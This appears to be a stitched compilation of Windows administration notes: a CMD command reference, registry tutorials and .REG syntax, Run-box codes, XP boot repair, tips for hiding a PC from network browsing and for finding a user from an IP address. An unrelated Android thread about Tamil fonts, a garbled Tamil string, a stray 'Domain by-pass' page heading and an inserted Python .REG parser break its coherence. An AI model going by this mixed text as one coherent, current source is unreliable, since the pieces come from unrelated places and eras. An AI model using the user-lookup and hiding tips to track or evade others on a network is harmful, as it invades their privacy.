CHKNTFS  Check the NTFS file system
CHOICE  Accept keyboard input to a batch file
CIPHER  Encrypt or Decrypt files/folders
CleanMgr  Automated cleanup of Temp files, recycle bin
CLEARMEM  Clear memory leaks

CLIP  Copy STDIN to the Windows clipboard.
CLS  Clear the screen•
CLUSTER  Windows Clustering
CMD  Start a new CMD shell
CMDKEY  Manage stored usernames/passwords
COLOR  Change colors of the CMD window•
COMP  Compare the contents of two files or sets of files
COMPACT  Compress files or folders on an NTFS partition
COMPRESS  Compress individual files on an NTFS partition
CON2PRT  Connect or disconnect a Printer
CONVERT  Convert a FAT drive to NTFS.
COPY  Copy one or more files to another location•
CSCcmd  Client-side caching (Offline Files)
CSVDE  Import or Export Active Directory data

d
DATE  Display or set the date•
DEFRAG  Defragment hard drive
DEL  Delete one or more files•
DELPROF  Delete NT user profiles
DELTREE  Delete a folder and all subfolders
DevCon  Device Manager Command Line Utility
DIR  Display a list of files and folders•
DIRUSE  Display disk usage
DISKCOMP  Compare the contents of two floppy disks
DISKCOPY  Copy the contents of one floppy disk to another
DISKPART  Disk Administration
DNSSTAT  DNS Statistics
DOSKEY  Edit command line, recall commands, and create macros
DSACLs  Active Directory ACLs
DSAdd  Add items to active directory (user group computer)
DSGet  View items in active directory (user group computer)
DSQuery  Search for items in active directory (user group computer)

DSMod  Modify items in active directory (user group computer)
DSMove  Move an Active directory Object
DSRM  Remove items from Active Directory

e
ECHO  Display message on screen•
ENDLOCAL  End localisation of environment changes in a batch file•
ERASE  Delete one or more files•
EVENTCREATE  Add a message to the Windows event log
EXIT  Quit the current script/routine and set an errorlevel•
EXPAND  Uncompress files
EXTRACT  Uncompress CAB files

f
FC  Compare two files
FIND  Search for a text string in a file
FINDSTR  Search for strings in files
FOR /F  Loop command: against a set of files•
FOR /F  Loop command: against the results of another command•
FOR  Loop command: all options Files, Directory, List•
FORFILES  Batch process multiple files
FORMAT  Format a disk
FREEDISK  Check free disk space (in bytes)
FSUTIL  File and Volume utilities
FTP  File Transfer Protocol
FTYPE  Display or modify file types used in file extension associations•

g
GLOBAL  Display membership of global groups
GOTO  Direct a batch program to jump to a labelled line•
GPUPDATE  Update Group Policy settings

h
HELP  Online Help

i
iCACLS  Change file and folder permissions
IF  Conditionally perform a command•

IFMEMBER  Is the current user in an NT Workgroup
IPCONFIG  Configure IP

k
KILL  Remove a program from memory

l
LABEL  Edit a disk label
LOCAL  Display membership of local groups
LOGEVENT  Write text to the NT event viewer
LOGMAN  Manage Performance Monitor
LOGOFF  Log a user off
LOGTIME  Log the date and time in a file

m
MAPISEND  Send email from the command line
MBSAcli  Baseline Security Analyzer.
MEM  Display memory usage
MD  Create new folders•
MKLINK  Create a symbolic link (linkd)
MODE  Configure a system device
MORE  Display output, one screen at a time
MOUNTVOL  Manage a volume mount point
MOVE  Move files from one folder to another•
MOVEUSER  Move a user from one domain to another
MSG  Send a message
MSIEXEC  Microsoft Windows Installer
MSINFO32  System Information
MSTSC  Terminal Server Connection (Remote Desktop Protocol)
MV  Copy in-use files

n
NET  Manage network resources
NETDOM  Domain Manager
NETSH  Configure Network Interfaces, Windows Firewall & Remote access
NETSVC  Command-line Service Controller
NBTSTAT  Display networking statistics (NetBIOS over TCP/IP)
NETSTAT  Display networking statistics (TCP/IP)
NOW  Display the current Date and Time
NSLOOKUP  Name server lookup
NTBACKUP  Backup folders to tape

NTRIGHTS  Edit user account rights

o
OPENFILES  Query or display open files

p
PATH  Display or set a search path for executable files•
PATHPING  Trace route plus network latency and packet loss
PAUSE  Suspend processing of a batch file and display a message•
PERMS  Show permissions for a user
PERFMON  Performance Monitor
PING  Test a network connection
POPD  Restore the previous value of the current directory saved by PUSHD•
PORTQRY  Display the status of ports and services
POWERCFG  Configure power settings
PRINT  Print a text file
PRINTBRM  Print queue Backup/Recovery
PRNCNFG  Display, configure or rename a printer
PRNMNGR  Add, delete, list printers set the default printer
PROMPT  Change the command prompt•
PsExec  Execute process remotely
PsFile  Show files opened remotely
PsGetSid  Display the SID of a computer or a user
PsInfo  List information about a system
PsKill  Kill processes by name or process ID
PsList  List detailed information about processes
PsLoggedOn  Who's logged on (locally or via resource sharing)
PsLogList  Event log records
PsPasswd  Change account password
PsService  View and control services
PsShutdown  Shutdown or reboot a computer
PsSuspend  Suspend processes
PUSHD  Save and then change the current directory•

q
QGREP  Search file(s) for lines that match a given pattern.

r
RASDIAL  Manage RAS connections
RASPHONE  Manage RAS connections
RECOVER  Recover a damaged file from a defective disk.
REG  Registry: Read, Set, Export, Delete keys and values
REGEDIT  Import or export registry settings
REGSVR32  Register or unregister a DLL
REGINI  Change Registry Permissions
REM  Record comments (remarks) in a batch file•
REN  Rename a file or files•
REPLACE  Replace or update one file with another
RD  Delete folder(s)•
RMTSHARE  Share a folder or a printer
ROBOCOPY  Robust File and Folder Copy
ROUTE  Manipulate network routing tables
RUN  Start | RUN commands
RUNAS  Execute a program under a different user account
RUNDLL32  Run a DLL command (add/remove print connections)

s
SC  Service Control
SCHTASKS  Schedule a command to run at a specific time
SCLIST  Display NT Services
SET  Display, set, or remove environment variables•
SETLOCAL  Control the visibility of environment variables•
SETX  Set environment variables permanently
SFC  System File Checker
SHARE  List or edit a file share or print share
SHIFT  Shift the position of replaceable parameters in a batch file•
SHORTCUT  Create a windows shortcut (.LNK file)
SHOWGRPS  List the NT Workgroups a user has joined
SHOWMBRS  List the Users who are members of a Workgroup

SHUTDOWN  Shutdown the computer
SLEEP  Wait for x seconds
SLMGR  Software Licensing Management (Vista/2008)
SOON  Schedule a command to run in the near future
SORT  Sort input
START  Start a program or command in a separate window•
SU  Switch User
SUBINACL  Edit file and folder Permissions, Ownership and Domain
SUBST  Associate a path with a drive letter
SYSTEMINFO  List system configuration

t
TASKLIST  List running applications and services
TASKKILL  Remove a running process from memory
TIME  Display or set the system time•
TIMEOUT  Delay processing of a batch file
TITLE  Set the window title for a CMD.EXE session•
TLIST  Task list with full path
TOUCH  Change file timestamps
TRACERT  Trace route to a remote host
TREE  Graphical display of folder structure
TSSHUTDN  Remotely shut down or reboot a terminal server
TYPE  Display the contents of a text file•
TypePerf  Write performance data to a log file

u
USRSTAT  List domain usernames and last login

v
VER  Display version information•
VERIFY  Verify that files have been saved•
VOL  Display a disk label•

w
WAITFOR  Wait for or send a signal
WHERE  Locate and display files in a directory tree
WHOAMI  Output the current UserName and domain
WINDIFF  Compare the contents of two files or sets of files

WINMSDP  Windows system report
WINRM  Windows Remote Management
WINRS  Windows Remote Shell
WMIC  WMI Commands
WUAUCLT  Windows Update

x
XCACLS  Change file and folder permissions
XCOPY  Copy files and folders

::  Comment / Remark•

Commands marked • are Internal commands only available within the CMD shell. All other commands (not marked with •) are external commands which may be used under the CMD shell, PowerShell, or directly from START-RUN.

Finished

I performed the following steps but the modified key value reverts back to 0.

1. Go to Start --> Run, then type Regedit.
2. Navigate to the registry folder HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL
3. Find a key called CheckedValue.
4. Double-click the CheckedValue key and modify it to 1. (This is to show all the hidden files.)

Please suggest further steps.

How to Hide Yourself from Network Users, and Give Access to Only Specific Users

written by Madhukara H at June 2, 2007

How to Hide in the (Network) Neighborhood

Don't want your XP computer to show up in the network browse list (Network Neighborhood/My Network Places) to other users on your network? One way to accomplish that is to disable file sharing. To do this, click Start, right click My Network Places and select Properties. Right click your local area connection and click Properties. Uncheck the box that says File and Printer Sharing for Microsoft Networks. Click OK.

But what if you want to be able to share folders with some users; you just don't want everyone on the network to see your computer's shares? There's a way:

Click Start and select Run.

In the Run box, type net config server /hidden:yes

Click OK.

Now others who know the UNC path (\\computer name\share name) can connect to your computer's shares from the Run box, but it won't show up in the network browse list.

How to look up a user name and machine name using an IP address (on Windows)

If you need to find a username but only have an IP address, and you use Active Directory (AD), you can use the following method to find out the username:

At the command prompt enter the following command:

nbtstat -a ipaddress

Where ipaddress is the ip address.

This will list the machine name using that ip address.

Then run the following command:

net view /domain:ad > somefile.txt

Where ad is the name of the domain you want to search and somefile.txt is the name of the file to contain the output.

This will generate a list of every machine and who is logged in.

Open the output file and search for the machine name determined in step 1 (the username will be listed next to this).

HTH

If you are using WebView, place your font file 'tamilfont.ttf' in the assets folder, and the Java code will be similar to this. Notice the font is applied in the CSS.

data = "<html><head><style>@font-face {font-family: 'tamilfont';src: url('file:///android_asset/tamilfont.ttf');} h1 { font-family: 'tamilfont'; } </style></head><body> <h1>தமிழ !</h1> </body></html>";

WebView wv = (WebView)findViewById(R.id.webview);

wv.loadDataWithBaseURL(null, data, "text/html", "UTF-8", null);

This approach does not work in Android 2.0 and 2.1.

answered Apr 18 '11 at 10:23 - Sam Quest

hi i am using json and stored as string – tamil Apr 19 '11 at 12:47

what is your output control to display? WebView / TextView ... – Sam Quest Apr 20 '11 at 5:14

@PM - Paresh Mayani: could you kindly point me where 'he' has mentioned webview. i presume that 'he' is 'me'. ;) – Sam Quest Jul 1 '11 at 4:44

Step 1: Download a tamil font .ttf file. (For example say kanchi.ttf).

Step 2: Now create a directory "fonts" in your assets folder in the android project.

Step 3: Now copy the kanchi.ttf file into the assets/fonts folder in your Android project.

Step 4: Add these lines to your onCreate()

// Class-level field (a "protected static" declaration cannot sit inside a method):
protected static Typeface tamil = null;

// Inside onCreate():
tamil = Typeface.createFromAsset(getAssets(), "fonts/kanchi.ttf");

Step 5: Now provide this typeface to your TextView you want.

textview = (TextView) findViewById(R.id.tipstext);

textview.setTypeface(tamil);

textview.setTextSize(20);

textview.setText("nkZk;");

answered Jul 1 '11 at 7:21 - Andro Selva

Hi, thanks for your help. I have one more doubt here: I want to display something like "இ த ெமாழிய : English". How do I set this string in a TextView? – tamil Jul 7 '11 at 6:11

I am not sure. But it's better if you use two textview for this type. – Andro Selva Jul 7 '11 at 6:14

check this, there is something going on about tamil unicode for android as inbuild

http://xkrishx.wordpress.com/2011/07/30/tamil-unicode-font-for-android/

Run Command Codes:

1. Accessibility Controls - access.cpl

2. Accessibility Wizard - accwiz

3. Add Hardware Wizard - hdwwiz.cpl

4. Add/Remove Programs - appwiz.cpl

5. Administrative Tools - control admintools

6. Automatic Updates - wuaucpl.cpl

7. Bluetooth Transfer Wizard - fsquirt

8. Calculator - calc

9. Certificate Manager - certmgr.msc

10. Character Map - charmap

11. Check Disk Utility - chkdsk

12. Clipboard Viewer - clipbrd

13. Command Prompt - cmd

14. Component Services - dcomcnfg

15. Computer Management - compmgmt.msc

16. Control Panel - control

17. Date and Time Properties - timedate.cpl

18. DDE Shares - ddeshare

19. Device Manager - devmgmt.msc

20. Direct X Troubleshooter - dxdiag

21. Disk Cleanup Utility - cleanmgr

22. Disk Defragment - dfrg.msc

23. Disk Management - diskmgmt.msc

24. Disk Partition Manager - diskpart

25. Display Properties - control desktop

26. Display Properties - desk.cpl

27. Dr. Watson System Troubleshooting Utility - drwtsn32

28. Driver Verifier Utility - verifier

29. Event Viewer - eventvwr.msc

30. Files and Settings Transfer Tool - migwiz

31. File Signature Verification Tool - sigverif

32. Findfast - findfast.cpl

33. Firefox - firefox

34. Folders Properties - control folders

35. Fonts - control fonts

36. Fonts Folder - fonts

37. Free Cell Card Game - freecell

38. Game Controllers - joy.cpl

39. Group Policy Editor (for xp professional) - gpedit.msc

40. Hearts Card Game - mshearts

41. Help and Support - helpctr

42. HyperTerminal - hypertrm

43. Iexpress Wizard - iexpress

44. Indexing Service - ciadv.msc

45. Internet Connection Wizard - icwconn1

46. Internet Explorer - iexplore

47. Internet Properties - inetcpl.cpl

48. Keyboard Properties - control keyboard

49. Local Security Settings - secpol.msc

50. Local Users and Groups - lusrmgr.msc

51. Logs You Out Of Windows - logoff

52. Malicious Software Removal Tool - mrt

53. Microsoft Chat - winchat

54. Microsoft Movie Maker - moviemk

55. Microsoft Paint - mspaint

56. Microsoft Synchronization Tool - mobsync

57. Minesweeper Game - winmine

58. Mouse Properties - control mouse

59. Mouse Properties - main.cpl

60. Netmeeting - conf

61. Network Connections - control netconnections

62. Network Connections - ncpa.cpl

63. Network Setup Wizard - netsetup.cpl

64. Notepad - notepad

65. Object Packager - packager

66. ODBC Data Source Administrator - odbccp32.cpl

67. On Screen Keyboard - osk

68. Outlook Express - msimn

69. Paint - pbrush

70. Password Properties - password.cpl

71. Performance Monitor - perfmon.msc

72. Performance Monitor - perfmon

73. Phone and Modem Options - telephon.cpl

74. Phone Dialer - dialer

75. Pinball Game - pinball

76. Power Configuration - powercfg.cpl

77. Printers and Faxes - control printers

78. Printers Folder - printers

79. Regional Settings - intl.cpl

80. Registry Editor - regedit

81. Registry Editor - regedt32

82. Remote Access Phonebook - rasphone

83. Remote Desktop - mstsc

84. Removable Storage - ntmsmgr.msc

85. Removable Storage Operator Requests - ntmsoprq.msc

86. Resultant Set of Policy (for xp professional) - rsop.msc

87. Scanners and Cameras - sticpl.cpl

88. Scheduled Tasks - control schedtasks

89. Security Center - wscui.cpl

90. Services - services.msc

91. Shared Folders - fsmgmt.msc

92. Shuts Down Windows - shutdown

93. Sounds and Audio - mmsys.cpl

94. Spider Solitaire Card Game - spider

95. SQL Client Configuration - cliconfg

96. System Configuration Editor - sysedit

97. System Configuration Utility - msconfig

98. System Information - msinfo32

99. System Properties - sysdm.cpl

100. Task Manager - taskmgr

101. TCP Tester - tcptest

102. Telnet Client - telnet

103. User Account Management - nusrmgr.cpl

104. Utility Manager - utilman

105. Windows Address Book - wab

106. Windows Address Book Import Utility - wabmig

107. Windows Explorer - explorer

108. Windows Firewall - firewall.cpl

109. Windows Magnifier - magnify

110. Windows Management Infrastructure - wmimgmt.msc

111. Windows Media Player - wmplayer

112. Windows Messenger - msmsgs

113. Windows System Security Tool - syskey

114. Windows Update Launches - wupdmgr

115. Windows Version - winver

116. Windows XP Tour Wizard - tourstart

117. Wordpad - write

Windows XP users

1. Insert the Windows XP bootable CD into the computer.
2. When prompted to press any key to boot from the CD, press any key.
3. Once in the Windows XP setup menu press the "R" key to repair Windows.
4. Log into your Windows installation by pressing the "1" key and pressing Enter.
5. You will then be prompted for your administrator password; enter that password.
6. Copy the below two files to the root directory of the primary hard disk. In the below example we are copying these files from the CD-ROM drive letter, which in this case is "e." This letter may be different on your computer.

copy e:\i386\ntldr c:\
copy e:\i386\ntdetect.com c:\

7. Once both of these files have been successfully copied, remove the CD from the computer and reboot.

Windows Registry Tutorial

Overview

The Registry is a database used to store settings and options for the 32 bit versions of Microsoft Windows including Windows 95, 98, ME and NT/2000. It contains information and settings for all the hardware, software, users, and preferences of the PC. Whenever a user makes changes to Control Panel settings, File Associations, System Policies, or installed software, the changes are reflected and stored in the Registry.

The physical files that make up the registry are stored differently depending on your version of Windows: under Windows 95 & 98 it is contained in two hidden files in your Windows directory, called USER.DAT and SYSTEM.DAT; for Windows Me there is an additional CLASSES.DAT file; while under Windows NT/2000 the files are contained separately in the %SystemRoot%\System32\Config directory. You cannot edit these files directly; you must use a tool commonly known as a "Registry Editor" to make any changes (using registry editors will be discussed later in the article).

The Structure of the Registry

The Registry has a hierarchical structure; although it looks complicated, the structure is similar to the directory structure on your hard disk, with Regedit being similar to Windows Explorer. Each main branch (denoted by a folder icon in the Registry Editor, see left) is called a Hive, and Hives contain Keys. Each key can contain other keys (sometimes referred to as sub-keys), as well as Values. The values contain the actual information stored in the Registry. There are three types of values: String, Binary, and DWORD; the use of these depends upon the context.

There are six main branches, each containing a specific portion of the information stored in the Registry. They are as follows:

HKEY_CLASSES_ROOT - This branch contains all of your file association mappings to support the drag-and-drop feature, OLE information, Windows shortcuts, and core aspects of the Windows user interface.

HKEY_CURRENT_USER - This branch links to the section of HKEY_USERS appropriate for the user currently logged onto the PC and contains information such as logon names, desktop settings, and Start menu settings.

HKEY_LOCAL_MACHINE - This branch contains computer specific information about the type of hardware, software, and other preferences on a given PC, this information is used for all users who log onto this computer.

HKEY_USERS - This branch contains individual preferences for each user of the computer, each user is represented by a SID sub-key located under the main branch.

HKEY_CURRENT_CONFIG - This branch links to the section of HKEY_LOCAL_MACHINE appropriate for the current hardware configuration.

HKEY_DYN_DATA - This branch points to the part of HKEY_LOCAL_MACHINE for use with the Plug-&-Play features of Windows; this section is dynamic and will change as devices are added and removed from the system.

Each registry value is stored as one of five main data types:

REG_BINARY - This type stores the value as raw binary data. Most hardware component information is stored as binary data, and can be displayed in an editor in hexadecimal format.

REG_DWORD - This type represents the data by a four byte number and is commonly used for boolean values, such as "0" is disabled and "1" is enabled. Additionally many parameters for device driver and services are this type, and can be displayed in REGEDT32 in binary, hexadecimal and decimal format, or in REGEDIT in hexadecimal and decimal format.

REG_EXPAND_SZ - This type is an expandable data string, that is, a string containing a variable to be replaced when called by an application. For example, for the following value, the string "%SystemRoot%" will be replaced by the actual location of the directory containing the Windows NT system files. (This type is only available using an advanced registry editor such as REGEDT32)

REG_MULTI_SZ - This type is a multiple string used to represent values that contain lists or multiple values, each entry is separated by a NULL character. (This type is only available using an advanced registry editor such as REGEDT32)

REG_SZ - This type is a standard string, used to represent human readable text values.

Other data types not available through the standard registry editors include:

REG_DWORD_LITTLE_ENDIAN - A 32-bit number in little-endian format.

REG_DWORD_BIG_ENDIAN - A 32-bit number in big-endian format.

REG_LINK - A Unicode symbolic link. Used internally; applications should not use this type.

REG_NONE - No defined value type.

REG_QWORD - A 64-bit number.

REG_QWORD_LITTLE_ENDIAN - A 64-bit number in little-endian format.

REG_RESOURCE_LIST - A device-driver resource list.

Editing the Registry

The Registry Editor (REGEDIT.EXE) is included with most versions of Windows (although you won't find it on the Start Menu); it enables you to view, search and edit the data within the Registry. There are several methods for starting the Registry Editor; the simplest is to click on the Start button, then select Run, and in the Open box type "regedit". If the Registry Editor is installed it should now open and look like the image below.

An alternative Registry Editor (REGEDT32.EXE) is available for use with Windows NT/2000, it includes some additional features not found in the standard version, including; the ability to view and modify security permissions, and being able to create and modify the extended string values REG_EXPAND_SZ & REG_MULTI_SZ.

Create a Shortcut to Regedit

This can be done by simply right-clicking on a blank area of your desktop, selecting New, then Shortcut, then in the Command line box enter "regedit.exe" and click Next, enter a friendly name (e.g. 'Registry Editor') then click Finish and now you can double click on the new icon to launch the Registry Editor.

Using Regedit to modify your Registry

Once you have started the Regedit you will notice that on the left side there is a tree with folders, and on the right the contents (values) of the currently selected folder.

Like Windows explorer, to expand a certain branch (see the structure of the registry section), click on the plus sign [+] to the left of any folder, or just double-click on the folder. To display the contents of a key (folder), just click the desired key, and look at the values listed on the right side. You can add a new key or value by selecting New from the Edit menu, or by right-clicking your mouse. And you can rename any value and almost any key with the same method used to rename files; right-click on an object and click rename, or click on it twice (slowly), or just press F2 on the keyboard. Lastly, you can delete a key or value by clicking on it, and pressing Delete on the keyboard, or by right-clicking on it, and choosing Delete.

Note: it is always a good idea to backup your registry before making any changes to it. It can be intimidating to a new user, and there is always the possibility of changing or deleting a critical setting causing you to have to reinstall the whole operating system. It's much better to be safe than sorry!

Importing and Exporting Registry Settings

A great feature of the Registry Editor is its ability to import and export registry settings to a text file. This text file, identified by the .REG extension, can then be saved or shared with other people to easily modify local registry settings. You can see the layout of these text files by simply exporting a key to a file and opening it in Notepad. To do this using the Registry Editor, select a key, then from the "Registry" menu choose "Export Registry File...", choose a filename and save. If you open this file in Notepad you will see a file similar to the example below:

REGEDIT4

[HKEY_LOCAL_MACHINE\SYSTEM\Setup]

"SetupType"=dword:00000000

"CmdLine"="setup -newsetup"

"SystemPrefix"=hex:c5,0b,00,00,00,40,36,02

The layout is quite simple: REGEDIT4 indicates the file type and version, [HKEY_LOCAL_MACHINE\SYSTEM\Setup] indicates the key the values are from, and "SetupType"=dword:00000000 and the lines after it are the values themselves. The portion after the "=" will vary depending on the type of value: DWORD, String or Binary.

So by simply editing this file to make the changes you want, it can then be easily distributed and all that need to be done is to double-click, or choose "Import" from the Registry menu, for the settings to be added to the system Registry.

Deleting keys or values using a REG file

It is also possible to delete keys and values using REG files. To delete a key, start by using the same format as the REG file above, but place a "-" symbol in front of the key name you want to delete. For example, to delete the [HKEY_LOCAL_MACHINE\SYSTEM\Setup] key the REG file would look like this:

REGEDIT4

[-HKEY_LOCAL_MACHINE\SYSTEM\Setup]

The format used to delete individual values is similar, but instead of a minus sign in front of the whole key, place it after the equal sign of the value. For example, to delete the value "SetupType" the file would look like:

REGEDIT4

[HKEY_LOCAL_MACHINE\SYSTEM\Setup]

"SetupType"=-

Use this feature with care, as deleting the wrong key or value could cause major problems within the registry, so remember to always make a backup first.
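Because a .REG file can delete keys and values as well as set them, it helps to list what a file would do before importing it. The Python parser below is an added example, not part of the original tutorial; it handles only the REGEDIT4 syntax described above (string, dword: and hex: values, [-key] and "name"=- deletions), and the HKEY_CURRENT_USER key in the sample is a constructed placeholder.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

HEADER = "REGEDIT4"
# "Name"=data or @=data (the key's default value); names may contain \" and \\ escapes
VALUE_RE = re.compile(r'^(?:"((?:[^"\\]|\\.)*)"|(@))\s*=\s*(.*)$')
STRING_RE = re.compile(r'^"((?:[^"\\]|\\.)*)"$')


@dataclass
class RegAction:
    op: str                      # "set", "delete_value" or "delete_key"
    key: str
    name: Optional[str] = None   # None for key-level actions, "@" for the default value
    kind: Optional[str] = None   # REG_SZ, REG_DWORD or REG_BINARY
    data: object = None


def _unescape(text: str) -> str:
    return re.sub(r"\\(.)", r"\1", text)


def _logical_lines(text: str):
    """Yield stripped lines, joining the trailing-backslash continuations used by long hex: values."""
    pending = ""
    for raw in text.splitlines():
        line = raw.strip()
        if line.endswith("\\"):
            pending += line[:-1]
            continue
        yield pending + line
        pending = ""
    if pending:
        yield pending


def _parse_value(key: str, name: str, raw: str) -> RegAction:
    if raw == "-":
        return RegAction("delete_value", key, name)
    lowered = raw.lower()
    if lowered.startswith("dword:"):
        digits = raw[6:]
        if not re.fullmatch(r"[0-9a-fA-F]{1,8}", digits):
            raise ValueError(f"bad dword for {name!r}: {raw!r}")
        return RegAction("set", key, name, "REG_DWORD", int(digits, 16))
    if lowered.startswith("hex:"):
        body = raw[4:].replace(" ", "")
        data = bytes(int(b, 16) for b in body.split(",") if b)
        return RegAction("set", key, name, "REG_BINARY", data)
    match = STRING_RE.match(raw)
    if match:
        return RegAction("set", key, name, "REG_SZ", _unescape(match.group(1)))
    raise ValueError(f"unsupported data for {name!r}: {raw!r}")


def parse_reg(text: str) -> List[RegAction]:
    """Return the actions a REGEDIT4 file would perform, in file order."""
    lines = [l for l in _logical_lines(text) if l and not l.startswith(";")]
    if not lines or lines[0] != HEADER:
        raise ValueError("not a REGEDIT4 file")
    actions: List[RegAction] = []
    key = None
    for line in lines[1:]:
        if line.startswith("[") and line.endswith("]"):
            key = line[1:-1]
            if key.startswith("-"):
                actions.append(RegAction("delete_key", key[1:]))
                key = None       # values cannot follow a key that is being deleted
            continue
        match = VALUE_RE.match(line)
        if match is None or key is None:
            raise ValueError(f"unexpected line: {line!r}")
        name = "@" if match.group(2) else _unescape(match.group(1))
        actions.append(_parse_value(key, name, match.group(3).strip()))
    return actions


def destructive(actions: List[RegAction]) -> List[RegAction]:
    """Only the actions that remove something from the registry."""
    return [a for a in actions if a.op != "set"]


# Constructed sample: the tutorial's Setup values plus one value deletion and one key deletion.
SAMPLE = r"""REGEDIT4

[HKEY_LOCAL_MACHINE\SYSTEM\Setup]
"CmdLine"="setup -newsetup"
"SystemPrefix"=hex:c5,0b,00,00,\
  00,40,36,02
"SetupType"=-

[-HKEY_CURRENT_USER\Software\ExampleVendor\OldApp]
"""

if __name__ == "__main__":
    for action in parse_reg(SAMPLE):
        flag = "!!" if action.op != "set" else "  "
        print(flag, action.op, action.key, action.name, action.kind, action.data)
```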

Regedit Command Line Options

Regedit has a number of command line options to help automate its use in either batch files or from the command prompt. Listed below are some of the options; please note that some of the functions are operating system specific.

Page 46: About Domain by-pass

46  

regedit.exe [options] [filename] [regpath]

[filename]

Import .reg file into the registry

/s [filename]

Silent import, i.e. hide confirmation box when importing files

/e [filename] [regpath]

Export the registry to [filename] starting at [regpath] e.g. regedit /e file.reg HKEY_USERS\.DEFAULT

/L:system

Specify the location of the system.dat to use

/R:user

Specify the location of the user.dat to use

C [filename]

Compress (Windows 98)

/D [regpath]

Delete the specified key (Windows 98)

Maintaining the Registry

On Windows NT you can use either the "Last Known Good" option or RDISK to restore the registry to a stable working configuration.

How can I clean out old data from the Registry? Although it's possible to manually go through the Registry and delete unwanted entries, Microsoft provides a tool to automate the process; the program is called RegClean. RegClean analyzes Windows Registry keys stored in a common location in the Windows Registry. It finds keys that contain erroneous values and removes them from the Windows Registry after having recorded those entries in the Undo.Reg file.

The expected skills:

Able to understand Windows Registry.

Able to understand and use functions to manipulate Windows Registry.

Able to gather and understand the required information in order to use those functions.

Introduction

The registry is a system-defined database in which applications and system components store and retrieve configuration data. The data stored in the registry varies according to the version of Microsoft® Windows®. Applications use the registry API to retrieve, modify, or delete registry data. You should not edit registry data that does not belong to your application unless it is absolutely necessary. If there is an error in the registry, your system may not function properly. If this happens, you can restore the registry to the state it was in when you last started the computer successfully.

Structure of the Registry

The registry stores data in a tree format. Each node in the tree is called a key. Each key can contain both subkeys and data entries called values. Sometimes, the presence of a key is all the data that an application requires; other times, an application opens a key and uses the values associated with the key. A key can have any number of values, and the values can be in any form. Each key has a name consisting of one or more printable characters. Key names cannot include a backslash (\), but any other printable or unprintable character can be used. The name of each subkey is unique with respect to the key that is immediately above it in the hierarchy. Key names are not localized into other languages, although values may be. The following figure is an example registry key structure as displayed by the Registry Editor (regedit.exe).

Figure 1: Registry Editor.

Each of the trees under My Computer is a key. The HKEY_LOCAL_MACHINE key has the following subkeys: HARDWARE, SAM, SECURITY, SOFTWARE, and SYSTEM. Each value consists of a value name and its associated data, if any. MaxObjectNumber and VgaCompatible are values under the DEVICEMAP\VIDEO subkey that contain data.

Registry Storage Space

Although there are few technical limits to the type and size of data an application can store in the registry, certain practical guidelines exist to promote system efficiency. An application should store configuration and initialization data in the registry, and store other kinds of data elsewhere. Generally, data consisting of more than one or two kilobytes (KB) should be stored as a file and referred to by using a key in the registry rather than being stored as a value. Instead of duplicating large pieces of data in the registry, an application should save the data as a file and refer to the file. Executable binary code should never be stored in the registry. A value entry uses much less registry space than a key. To save space, an application should group similar data together as a structure and store the structure as a value rather than storing each of the structure members as a separate key. Storing the data in binary form allows an application to store data in one value that would otherwise be made up of several incompatible types.

Windows Server 2003 and Windows XP

Views of the registry files are mapped in the computer cache address space. Therefore, regardless of the size of the registry data, it is not charged more than 4 megabytes (MB). There are no longer any explicit limits on the total amount of space that may be consumed by hives in paged pool memory, and in disk space. The size of the system hive is limited only by physical memory.

Windows 2000 and Windows NT

Registry data is stored in the paged pool, an area of physical memory used for system data that can be written to disk when not in use. The RegistrySizeLimit value establishes the maximum amount of paged pool that can be consumed by registry data from all applications. This value is located in the following registry key:

HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control

By default, the registry size limit is 25 percent of the paged pool. The default size of the paged pool is 32 MB, so this is 8 MB. The system ensures that the minimum value of RegistrySizeLimit is 4 MB and the maximum is approximately 80 percent of the PagedPoolSize value. If the value of this entry is greater than 80 percent of the size of the paged pool, the system sets the maximum size of the registry to 80 percent of the size of the paged pool. This prevents the registry from consuming space needed by processes. Note that setting this value does not allocate space in the paged pool, nor does it assure that the space will be available if needed. The paged pool size is determined by the PagedPoolSize value in the following registry key:

HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SessionManager\MemoryManagement

Windows 2000: The maximum paged pool is approximately 300-470 MB, so the registry size limit is 240-376 MB. However, if the /3GB switch is used, the maximum paged pool size is 192 MB, so the registry can be a maximum of 153.6 MB.

Windows NT 4.0: The maximum paged pool size is 192 MB, so the registry size limit is 153.6 MB.

Windows NT 3.51 and earlier: The maximum paged pool is 128 MB, so the registry size limit is 102 MB.

Predefined Keys

An application must open a key before it can add data to the registry. To open a key, an application must supply a handle to another key in the registry that is already open. The system defines predefined keys that are always open. Predefined keys help an application navigate in the registry and make it possible to develop tools that allow a system administrator to manipulate categories of data. Applications that add data to the registry should always work within the framework of predefined keys, so administrative tools can find and use the new data.

An application can use handles to these keys as entry points to the registry. These handles are valid for all implementations of the registry, although the use of the handles may vary from platform to platform. In addition, other predefined handles have been defined for specific platforms. The following are handles to the predefined keys.

| Handle | Description |
| --- | --- |
| HKEY_CLASSES_ROOT | Registry entries subordinate to this key define types (or classes) of documents and the properties associated with those types. Shell and COM applications use the information stored under this key. This key also provides backward compatibility with the Windows 3.1 registration database by storing information for DDE and OLE support. File viewers and user interface extensions store their OLE class identifiers in HKEY_CLASSES_ROOT, and in-process servers are registered in this key. This handle should not be used in a service or an application that impersonates different users. |
| HKEY_CURRENT_CONFIG | Contains information about the current hardware profile of the local computer system. The information under HKEY_CURRENT_CONFIG describes only the differences between the current hardware configuration and the standard configuration. Information about the standard hardware configuration is stored under the Software and System keys of HKEY_LOCAL_MACHINE. HKEY_CURRENT_CONFIG is an alias for HKEY_LOCAL_MACHINE\System\CurrentControlSet\Hardware Profiles\Current. Windows NT 3.51 and earlier: This key does not exist. |
| HKEY_CURRENT_USER | Registry entries subordinate to this key define the preferences of the current user. These preferences include the settings of environment variables, data about program groups, colors, printers, network connections, and application preferences. This key makes it easier to establish the current user's settings; the key maps to the current user's branch in HKEY_USERS. In HKEY_CURRENT_USER, software vendors store the current user-specific preferences to be used within their applications. Microsoft, for example, creates the HKEY_CURRENT_USER\Software\Microsoft key for its applications to use, with each application creating its own subkey under the Microsoft key. This handle should not be used in a service or an application that impersonates different users. Instead, call the RegOpenCurrentUser() function. |
| HKEY_DYN_DATA | Windows Me/98/95: Registry entries subordinate to this key allow you to collect performance data. |
